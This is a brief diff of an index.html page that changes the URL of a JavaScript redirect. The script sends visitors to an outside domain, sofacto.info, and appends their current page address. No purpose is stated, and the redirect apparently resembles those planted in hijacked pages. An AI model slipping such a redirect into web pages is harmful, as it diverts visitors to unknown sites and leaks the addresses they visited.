--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
         var e = window.location.href;
         
        
-        Redirect("https://sofacto.info/tcncc/?url="+e);
+        Redirect("https://sofacto.info/tcncc/index.php?url="+e);
     }
 </script>
 </head>
